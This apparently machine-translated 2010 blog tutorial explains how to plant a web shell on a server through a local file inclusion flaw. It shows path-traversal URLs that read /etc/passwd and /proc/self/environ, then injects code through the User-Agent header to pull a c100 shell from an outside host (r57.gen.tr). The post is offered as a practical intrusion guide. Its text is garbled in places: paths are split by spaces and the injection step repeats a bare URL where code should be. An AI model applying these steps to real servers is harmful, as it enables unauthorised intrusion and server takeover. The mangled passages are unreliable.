Thursday, April 1, 2010

Shell planting via LFI with Method proc / Self / environ Line Break

In hacking tutorial this time I will try to implement how to create a shell on the target server via LFI using proc / self / environ, this has been discussed previously in the paper milw0rm website to 361.
Ok we just ...

1st. The first thing done like other techniques is that we first try to find websites vulnerable to attacks LFI.

example: http://site.com/info.php?file=news.php

2. let's replace the "news.php" with "../../../".

example: http://site.com/info.php?file=../../../

then we get the error, as follows ...

Warning: include (../../../) [function.include]: failed to open stream: No Standard and Poor files or directory in / home / Gunslinger / public_html / info.php on line 99

ok it seems, we have the opportunity to take advantage of include another file.
selanjutanya we try to find / etc / passwd.

example: http://site.com/info.php?file=etc/passwd
But we still get an error like the following:

Warning: include (/ etc / passwd) [function.include]: failed to open stream: No Standard and Poor files or directory in / home / Gunslinger / public_html / info.php on line 99th

what if we directorynya Rev?
let's try ...

example: http://site.com/info.php?file=../../../../../../../../../etc/passwd

Ahoi, we managed to get the file / etc / passwd file that looks like the following:

root: X: 0:0: root: / root: / bin / bash
daemon: x: 1:1: daemon: / usr / sbin: / bin / sh
bin: x: 2:2: bin: / bin: / bin / sh
sys: x: 3:3: sys: / dev: / bin / sh
sync: x: 4:65534: sync: / bin: / bin / sync
games: x: 5:60: games: / usr / games: / bin / sh
man: x: 6:12: man: / var / cache / man: / bin / sh
lp: X: 7:7: lp: / var / spool / lpd: / bin / sh
mail: x: 8:8: mail: / var / mail: / bin / sh
news: x: 9:9: news: / var / spool / news: / bin / sh
uucp: x: 10:10: uucp: / var / spool / uucp: / bin / sh
proxy: x: 13:13: proxy: / bin: / bin / sh
www-data: x: 33:33: www-data: / var / www: / bin / sh
backup: x: 34:34: backup: / var / backups: / bin / sh
list: x: 38:38: Mailing List Manager: / var / list: / bin / sh
irc: x: 39:39: ircd: / var / run / ircd: / bin / sh
gnats: x: 41:41: Gnats Bug-Reporting System (admin): / var / lib / gnats: / bin / sh
nobody: x: 65534:65534: nobody: / nonexistent: / bin / sh
libuuid: x: 100:101:: / var / lib / libuuid: / bin / sh
syslog: x: 101:102:: / home / syslog: / bin / false
klog: x: 102:103:: / home / klog: / bin / false
hplip: x: 103:7: HPLIP system user ,,,:/ var / run / hplip: / bin / false
avahi-autoipd: x: 104:110: Avahi daemon autoip ,,,:/ var / lib / avahi-autoipd: / bin / false
gdm: x: 105:111: Gnome Display Manager: / var / lib / gdm: / bin / false
saned: x: 106:113:: / home / saned: / bin / false
pulse: x: 107:114: PulseAudio daemon ,,,:/ var / run / pulse: / bin / false
messagebus: x: 108:117:: / var / run / dbus: / bin / false
polkituser: x: 109:118: PolicyKit ,,,:/ var / run / PolicyKit: / bin / false
avahi: x: 110:119: Avahi mDNS daemon ,,,:/ var / run / avahi-daemon: / bin / false
haldaemon: x: 111:120: Hardware Abstraction Layer ,,,:/ var / run / hald: / bin / false
Gunslinger: x: 1000:1000: gunslinger_ ,,,:/ home / Gunslinger: / bin / bash
snmp: x: 112:65534:: / var / lib / snmp: / bin / false
guest: x: 113:124: Guest ,,,:/ tmp / guest-home.rRZGXM: / bin / bash
sshd: x: 114:65534:: / var / run / sshd: / usr / sbin / Nologin

3. Let us check whether / proc / self / environ can we access?
now, replace / etc / passwd "to" / proc / self / environ '

example: http://site.com/info.php?file=../../../../../../../../../proc/self/environ

If you get one like this:

DOCUMENT_ROOT = / home / Gunslinger / public_html GATEWAY_INTERFACE = CGI/1.1 HTTP_ACCEPT = text / html,
application / xml; q = 0.9, application / xhtml + xml, image / png, image / jpeg, image / gif,
image / x-xbitmap, * / *; q = 0.1 HTTP_COOKIE = PHPSESSID = 3g4t67261b341231b94r1844ac2ad7ac
HTTP_HOST = www.site.com HTTP_REFERER = http://www.site.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT = Mozilla/5.0 (X11; U; Linux i686; en-US; rv: 1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (Jaunty) Firefox/3.0.15
PATH = / bin: / usr / bin QUERY_STRING = view =..% 2F ..% 2F ..% 2F ..% 2F ..% 2F ..% 2Fproc% 2Fself% 2Fenviron
REDIRECT_STATUS = 200 REMOTE_ADDR = 6x.1xx.4x.1xx REMOTE_PORT = 35665th
REQUEST_METHOD = GET REQUEST_URI = / index.php? View =..% 2F ..% 2F ..% 2F ..% 2F ..% 2F ..% 2Fproc% 2Fself% 2Fenviron
SCRIPT_FILENAME = / home / Gunslinger / public_html / index.php SCRIPT_NAME = / index.php
SERVER_ADDR = 1xx.1xx.1xx.6x SERVER_ADMIN = gunslinger@site.com SERVER_NAME = www.site.com
Server_port = 80 SERVER_PROTOCOL = HTTP/1.0 SERVER_SIGNATURE =
Apache/2.2.11 (Unix) DAV / 2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at Port 80 www.site.com

Apparently proc / self / environ can we access!
if you get a blank page (blank) / proc / self / environ can not be accessed or may beroperating system * BSD

4. Now let us dengann malicious code injection with poison http-header. how can we menginjeksinya? we can use the tamper data in firefox addon.
you can download here: https: / / addons.mozilla.org/en-US/firefox/addon/966
open the tamper data in firefox and then input the url / proc / self / environ had "http://site.com/info.php?file=../../../../../../. . / .. / .. / proc / self / environ "
then on input the user-agent with the following code:

http://r57.gen.tr/c100.txt

or

http://r57.gen.tr/c100.txt

then submit.

5. if we managed to inject malicious code below, then the shell will be in a place like this.

http://www.site.com/shell.php

happy hacking!

0 comments:

 

Copyright 2010 By Ghiatsudin Asyrofi blogger templates | Make Money Online